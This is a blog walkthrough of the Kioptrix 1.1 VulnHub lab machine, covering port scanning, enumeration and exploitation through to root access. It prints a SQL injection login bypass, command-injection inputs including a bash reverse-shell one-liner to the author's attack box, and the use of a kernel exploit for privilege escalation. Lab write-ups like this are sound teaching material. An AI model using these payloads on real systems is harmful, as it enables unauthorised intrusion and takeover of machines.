4pfsec

Kioptrix 1.1 ~ VulnHub

Boxes Apr 19, 2021

Enumeration

NMAP

First, I went ahead and launched a port scan against the target machine.

nmap -Pn -A -sV -p- $target
PORT     STATE SERVICE    REASON         VERSION
22/tcp   open  ssh        syn-ack ttl 64 OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp   open  http       syn-ack ttl 64 Apache httpd 2.0.52 ((CentOS))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind    syn-ack ttl 64 2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            615/udp   status
|_  100024  1            618/tcp   status
443/tcp  open  ssl/https? syn-ack ttl 64
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/organizationalUnitName=SomeOrganizationalUnit/[email protected]/localityName=SomeCity
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/organizationalUnitName=SomeOrganizationalUnit/[email protected]/localityName=SomeCity
618/tcp  open  status     syn-ack ttl 64 1 (RPC #100024)
631/tcp  open  ipp        syn-ack ttl 64 CUPS 1.1
| http-methods: 
|   Supported Methods: GET HEAD OPTIONS POST PUT
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql      syn-ack ttl 64 MySQL (unauthorized)
MAC Address: 00:0C:29:A3:ED:9F (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Fine tuned scan results

WEB - 80

/cgi-bin/ (Status: 403) [Size: 289]
/cgi-bin/.html (Status: 403) [Size: 294]
/index.php (Status: 200) [Size: 667]
/index.php (Status: 200) [Size: 667]
/manual (Status: 301) [Size: 315]
/usage (Status: 403) [Size: 286]

/

/manual

Exploitation

Authentication Bypass

The web app was vulnerable to SQL Injection Authentication Bypass as shown below.

admin' or '1'='1'#

http://192.168.0.132/index.php

Command Injection

I noticed that the web app executed commands on the base system based on user input.

Thus, I decided to try and inject custom commands into this field to trigger the system to run it.

127.0.0.1 && whoami

As seen above, I was able to get command execution on the machine via the web portal. I then used this vulnerability to get a reverse shell back to my attack box as follows.

127.0.0.1 && bash -i >& /dev/tcp/192.168.0.108/443 0>&1

And it worked!

Privilege Escalation

Linpeas

While running linpeas, I noticed that the box was running a pretty old linux kernel version (2.6.9-55.EL).

Searchsploit

I then made my way to searchsploit to look for a kernel exploit that would fit this particular target.

searchsploit linux 2.6 centos
Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' | linux/local/9545.c

This was the exploit I ended up going with this!

GCC

I then transferred the file over to the remote machine before compiling it with GCC. This was to ensure that the architecture matched the executable in the end.

gcc -o exploit 9545.c

However, I ran into the shown error. All C source files need a newline at the end of the file for compilation. I just had to add that before compiling again.

After fixing that, the exploit compiled with no issues.

Rooty

And I was the root user! 😁

-Nee

Tags

Nee

Recommended for you